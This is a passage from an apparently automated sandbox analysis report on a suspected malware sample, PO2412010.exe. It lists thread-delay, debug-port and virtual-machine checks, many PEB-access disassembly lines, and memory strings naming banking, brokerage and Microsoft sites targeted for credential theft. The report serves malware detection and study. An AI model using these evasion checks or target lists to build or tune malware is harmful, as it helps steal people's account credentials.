                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 236563Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 236453Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 236344Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 236219Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 236109Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 236000Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 235891Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 235781Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 235670Jump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeThread delayed: delay time: 235531Jump to behavior
                Source: l420377x.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007892000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                Source: l420377x.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
                Source: l420377x.6.drBinary or memory string: tasks.office.comVMware20,11696503903o
                Source: l420377x.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007892000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l.comVMware20,11
                Source: l420377x.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
                Source: l420377x.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
                Source: l420377x.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
                Source: l420377x.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
                Source: l420377x.6.drBinary or memory string: bankofamerica.comVMware20,11696503903x
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007892000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sqlite_autoindex_autofill_edge_extended_1VMware
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007892000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rokers - EU WestVMware20
                Source: l420377x.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
                Source: l420377x.6.drBinary or memory string: global block list test formVMware20,11696503903
                Source: isoburn.exe, 00000006.00000002.3832319605.00000000028F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc$Gz
                Source: l420377x.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
                Source: l420377x.6.drBinary or memory string: ms.portal.azure.comVMware20,11696503903
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007892000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: COM.HKVMware20,
                Source: l420377x.6.drBinary or memory string: interactivebrokers.comVMware20,11696503903
                Source: l420377x.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
                Source: duvyEsVvTpq.exe, 00000009.00000002.3834494974.000000000158F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
                Source: l420377x.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
                Source: l420377x.6.drBinary or memory string: AMC password management pageVMware20,11696503903
                Source: l420377x.6.drBinary or memory string: turbotax.intuit.comVMware20,11696503903t
                Source: l420377x.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
                Source: l420377x.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007892000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: blocklistVMware20,1169659
                Source: firefox.exe, 0000000B.00000002.2109706572.000001C66A95C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
                Source: l420377x.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
                Source: l420377x.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
                Source: l420377x.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
                Source: l420377x.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
                Source: l420377x.6.drBinary or memory string: outlook.office365.comVMware20,11696503903t
                Source: l420377x.6.drBinary or memory string: outlook.office.comVMware20,11696503903s
                Source: l420377x.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007892000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hdfcbank.comVMware20,116
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007892000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: alstudio.comVMware20,116E
                Source: l420377x.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
                Source: l420377x.6.drBinary or memory string: dev.azure.comVMware20,11696503903j
                Source: l420377x.6.drBinary or memory string: discord.comVMware20,11696503903f
                Source: l420377x.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
                Source: C:\Users\user\Desktop\PO2412010.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC096E rdtsc 3_2_01AC096E
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_00417723 LdrLoadDll,3_2_00417723
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC0185 mov eax, dword ptr fs:[00000030h]3_2_01AC0185
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0019F mov eax, dword ptr fs:[00000030h]3_2_01B0019F
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0019F mov eax, dword ptr fs:[00000030h]3_2_01B0019F
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0019F mov eax, dword ptr fs:[00000030h]3_2_01B0019F
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0019F mov eax, dword ptr fs:[00000030h]3_2_01B0019F
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7A197 mov eax, dword ptr fs:[00000030h]3_2_01A7A197
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7A197 mov eax, dword ptr fs:[00000030h]3_2_01A7A197
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7A197 mov eax, dword ptr fs:[00000030h]3_2_01A7A197
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B24180 mov eax, dword ptr fs:[00000030h]3_2_01B24180
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B24180 mov eax, dword ptr fs:[00000030h]3_2_01B24180
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B3C188 mov eax, dword ptr fs:[00000030h]3_2_01B3C188
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B3C188 mov eax, dword ptr fs:[00000030h]3_2_01B3C188
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B561E5 mov eax, dword ptr fs:[00000030h]3_2_01B561E5
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AB01F8 mov eax, dword ptr fs:[00000030h]3_2_01AB01F8
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B461C3 mov eax, dword ptr fs:[00000030h]3_2_01B461C3
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B461C3 mov eax, dword ptr fs:[00000030h]3_2_01B461C3
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AFE1D0 mov eax, dword ptr fs:[00000030h]3_2_01AFE1D0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AFE1D0 mov eax, dword ptr fs:[00000030h]3_2_01AFE1D0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AFE1D0 mov ecx, dword ptr fs:[00000030h]3_2_01AFE1D0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AFE1D0 mov eax, dword ptr fs:[00000030h]3_2_01AFE1D0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AFE1D0 mov eax, dword ptr fs:[00000030h]3_2_01AFE1D0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AB0124 mov eax, dword ptr fs:[00000030h]3_2_01AB0124
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B40115 mov eax, dword ptr fs:[00000030h]3_2_01B40115
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2A118 mov ecx, dword ptr fs:[00000030h]3_2_01B2A118
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2A118 mov eax, dword ptr fs:[00000030h]3_2_01B2A118
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2A118 mov eax, dword ptr fs:[00000030h]3_2_01B2A118
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2A118 mov eax, dword ptr fs:[00000030h]3_2_01B2A118
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2E10E mov eax, dword ptr fs:[00000030h]3_2_01B2E10E
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2E10E mov ecx, dword ptr fs:[00000030h]3_2_01B2E10E
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2E10E mov eax, dword ptr fs:[00000030h]3_2_01B2E10E
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2E10E mov eax, dword ptr fs:[00000030h]3_2_01B2E10E
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2E10E mov ecx, dword ptr fs:[00000030h]3_2_01B2E10E
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2E10E mov eax, dword ptr fs:[00000030h]3_2_01B2E10E
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2E10E mov eax, dword ptr fs:[00000030h]3_2_01B2E10E
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2E10E mov ecx, dword ptr fs:[00000030h]3_2_01B2E10E
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2E10E mov eax, dword ptr fs:[00000030h]3_2_01B2E10E
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2E10E mov ecx, dword ptr fs:[00000030h]3_2_01B2E10E
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B54164 mov eax, dword ptr fs:[00000030h]3_2_01B54164
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B54164 mov eax, dword ptr fs:[00000030h]3_2_01B54164
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B18158 mov eax, dword ptr fs:[00000030h]3_2_01B18158
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7C156 mov eax, dword ptr fs:[00000030h]3_2_01A7C156
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B14144 mov eax, dword ptr fs:[00000030h]3_2_01B14144
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B14144 mov eax, dword ptr fs:[00000030h]3_2_01B14144
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B14144 mov ecx, dword ptr fs:[00000030h]3_2_01B14144
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B14144 mov eax, dword ptr fs:[00000030h]3_2_01B14144
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B14144 mov eax, dword ptr fs:[00000030h]3_2_01B14144
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A86154 mov eax, dword ptr fs:[00000030h]3_2_01A86154
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A86154 mov eax, dword ptr fs:[00000030h]3_2_01A86154
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A780A0 mov eax, dword ptr fs:[00000030h]3_2_01A780A0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B460B8 mov eax, dword ptr fs:[00000030h]3_2_01B460B8
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B460B8 mov ecx, dword ptr fs:[00000030h]3_2_01B460B8
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B180A8 mov eax, dword ptr fs:[00000030h]3_2_01B180A8
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8208A mov eax, dword ptr fs:[00000030h]3_2_01A8208A
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A880E9 mov eax, dword ptr fs:[00000030h]3_2_01A880E9
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7A0E3 mov ecx, dword ptr fs:[00000030h]3_2_01A7A0E3
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B060E0 mov eax, dword ptr fs:[00000030h]3_2_01B060E0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7C0F0 mov eax, dword ptr fs:[00000030h]3_2_01A7C0F0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AC20F0 mov ecx, dword ptr fs:[00000030h]3_2_01AC20F0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B020DE mov eax, dword ptr fs:[00000030h]3_2_01B020DE
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B16030 mov eax, dword ptr fs:[00000030h]3_2_01B16030
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7A020 mov eax, dword ptr fs:[00000030h]3_2_01A7A020
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7C020 mov eax, dword ptr fs:[00000030h]3_2_01A7C020
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B04000 mov ecx, dword ptr fs:[00000030h]3_2_01B04000
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B22000 mov eax, dword ptr fs:[00000030h]3_2_01B22000
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B22000 mov eax, dword ptr fs:[00000030h]3_2_01B22000
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B22000 mov eax, dword ptr fs:[00000030h]3_2_01B22000
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B22000 mov eax, dword ptr fs:[00000030h]3_2_01B22000
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B22000 mov eax, dword ptr fs:[00000030h]3_2_01B22000
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B22000 mov eax, dword ptr fs:[00000030h]3_2_01B22000
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B22000 mov eax, dword ptr fs:[00000030h]3_2_01B22000
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B22000 mov eax, dword ptr fs:[00000030h]3_2_01B22000
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A9E016 mov eax, dword ptr fs:[00000030h]3_2_01A9E016
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A9E016 mov eax, dword ptr fs:[00000030h]3_2_01A9E016
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A9E016 mov eax, dword ptr fs:[00000030h]3_2_01A9E016
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A9E016 mov eax, dword ptr fs:[00000030h]3_2_01A9E016
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AAC073 mov eax, dword ptr fs:[00000030h]3_2_01AAC073
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B06050 mov eax, dword ptr fs:[00000030h]3_2_01B06050
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A82050 mov eax, dword ptr fs:[00000030h]3_2_01A82050
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AA438F mov eax, dword ptr fs:[00000030h]3_2_01AA438F
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AA438F mov eax, dword ptr fs:[00000030h]3_2_01AA438F
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7E388 mov eax, dword ptr fs:[00000030h]3_2_01A7E388
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7E388 mov eax, dword ptr fs:[00000030h]3_2_01A7E388
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7E388 mov eax, dword ptr fs:[00000030h]3_2_01A7E388
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A78397 mov eax, dword ptr fs:[00000030h]3_2_01A78397
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A78397 mov eax, dword ptr fs:[00000030h]3_2_01A78397
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A78397 mov eax, dword ptr fs:[00000030h]3_2_01A78397
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A903E9 mov eax, dword ptr fs:[00000030h]3_2_01A903E9
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A903E9 mov eax, dword ptr fs:[00000030h]3_2_01A903E9
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A903E9 mov eax, dword ptr fs:[00000030h]3_2_01A903E9
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A903E9 mov eax, dword ptr fs:[00000030h]3_2_01A903E9
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A903E9 mov eax, dword ptr fs:[00000030h]3_2_01A903E9
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A903E9 mov eax, dword ptr fs:[00000030h]3_2_01A903E9
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A903E9 mov eax, dword ptr fs:[00000030h]3_2_01A903E9
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A903E9 mov eax, dword ptr fs:[00000030h]3_2_01A903E9
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AB63FF mov eax, dword ptr fs:[00000030h]3_2_01AB63FF
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A9E3F0 mov eax, dword ptr fs:[00000030h]3_2_01A9E3F0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A9E3F0 mov eax, dword ptr fs:[00000030h]3_2_01A9E3F0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A9E3F0 mov eax, dword ptr fs:[00000030h]3_2_01A9E3F0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B243D4 mov eax, dword ptr fs:[00000030h]3_2_01B243D4
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B243D4 mov eax, dword ptr fs:[00000030h]3_2_01B243D4
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8A3C0 mov eax, dword ptr fs:[00000030h]3_2_01A8A3C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8A3C0 mov eax, dword ptr fs:[00000030h]3_2_01A8A3C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8A3C0 mov eax, dword ptr fs:[00000030h]3_2_01A8A3C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8A3C0 mov eax, dword ptr fs:[00000030h]3_2_01A8A3C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8A3C0 mov eax, dword ptr fs:[00000030h]3_2_01A8A3C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8A3C0 mov eax, dword ptr fs:[00000030h]3_2_01A8A3C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A883C0 mov eax, dword ptr fs:[00000030h]3_2_01A883C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A883C0 mov eax, dword ptr fs:[00000030h]3_2_01A883C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A883C0 mov eax, dword ptr fs:[00000030h]3_2_01A883C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A883C0 mov eax, dword ptr fs:[00000030h]3_2_01A883C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2E3DB mov eax, dword ptr fs:[00000030h]3_2_01B2E3DB
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2E3DB mov eax, dword ptr fs:[00000030h]3_2_01B2E3DB
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2E3DB mov ecx, dword ptr fs:[00000030h]3_2_01B2E3DB
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2E3DB mov eax, dword ptr fs:[00000030h]3_2_01B2E3DB
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B063C0 mov eax, dword ptr fs:[00000030h]3_2_01B063C0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B3C3CD mov eax, dword ptr fs:[00000030h]3_2_01B3C3CD
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B58324 mov eax, dword ptr fs:[00000030h]3_2_01B58324
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B58324 mov ecx, dword ptr fs:[00000030h]3_2_01B58324
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B58324 mov eax, dword ptr fs:[00000030h]3_2_01B58324
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B58324 mov eax, dword ptr fs:[00000030h]3_2_01B58324
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABA30B mov eax, dword ptr fs:[00000030h]3_2_01ABA30B
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABA30B mov eax, dword ptr fs:[00000030h]3_2_01ABA30B
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABA30B mov eax, dword ptr fs:[00000030h]3_2_01ABA30B
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7C310 mov ecx, dword ptr fs:[00000030h]3_2_01A7C310
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01AA0310 mov ecx, dword ptr fs:[00000030h]3_2_01AA0310
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B2437C mov eax, dword ptr fs:[00000030h]3_2_01B2437C
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B28350 mov ecx, dword ptr fs:[00000030h]3_2_01B28350
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B4A352 mov eax, dword ptr fs:[00000030h]3_2_01B4A352
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0035C mov eax, dword ptr fs:[00000030h]3_2_01B0035C
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0035C mov eax, dword ptr fs:[00000030h]3_2_01B0035C
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0035C mov eax, dword ptr fs:[00000030h]3_2_01B0035C
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0035C mov ecx, dword ptr fs:[00000030h]3_2_01B0035C
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0035C mov eax, dword ptr fs:[00000030h]3_2_01B0035C
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B0035C mov eax, dword ptr fs:[00000030h]3_2_01B0035C
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B02349 mov eax, dword ptr fs:[00000030h]3_2_01B02349
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B5634F mov eax, dword ptr fs:[00000030h]3_2_01B5634F
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A902A0 mov eax, dword ptr fs:[00000030h]3_2_01A902A0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A902A0 mov eax, dword ptr fs:[00000030h]3_2_01A902A0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B162A0 mov eax, dword ptr fs:[00000030h]3_2_01B162A0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B162A0 mov ecx, dword ptr fs:[00000030h]3_2_01B162A0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B162A0 mov eax, dword ptr fs:[00000030h]3_2_01B162A0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B162A0 mov eax, dword ptr fs:[00000030h]3_2_01B162A0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B162A0 mov eax, dword ptr fs:[00000030h]3_2_01B162A0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B162A0 mov eax, dword ptr fs:[00000030h]3_2_01B162A0
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABE284 mov eax, dword ptr fs:[00000030h]3_2_01ABE284
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01ABE284 mov eax, dword ptr fs:[00000030h]3_2_01ABE284
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B00283 mov eax, dword ptr fs:[00000030h]3_2_01B00283
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B00283 mov eax, dword ptr fs:[00000030h]3_2_01B00283
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B00283 mov eax, dword ptr fs:[00000030h]3_2_01B00283
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A902E1 mov eax, dword ptr fs:[00000030h]3_2_01A902E1
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A902E1 mov eax, dword ptr fs:[00000030h]3_2_01A902E1
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A902E1 mov eax, dword ptr fs:[00000030h]3_2_01A902E1
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B562D6 mov eax, dword ptr fs:[00000030h]3_2_01B562D6
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8A2C3 mov eax, dword ptr fs:[00000030h]3_2_01A8A2C3
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8A2C3 mov eax, dword ptr fs:[00000030h]3_2_01A8A2C3
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8A2C3 mov eax, dword ptr fs:[00000030h]3_2_01A8A2C3
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8A2C3 mov eax, dword ptr fs:[00000030h]3_2_01A8A2C3
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A8A2C3 mov eax, dword ptr fs:[00000030h]3_2_01A8A2C3
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01A7823B mov eax, dword ptr fs:[00000030h]3_2_01A7823B
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B30274 mov eax, dword ptr fs:[00000030h]3_2_01B30274
                Source: C:\Users\user\Desktop\PO2412010.exeCode function: 3_2_01B30274 mov eax, dword ptr fs:[00000030h]3_2_01B30274
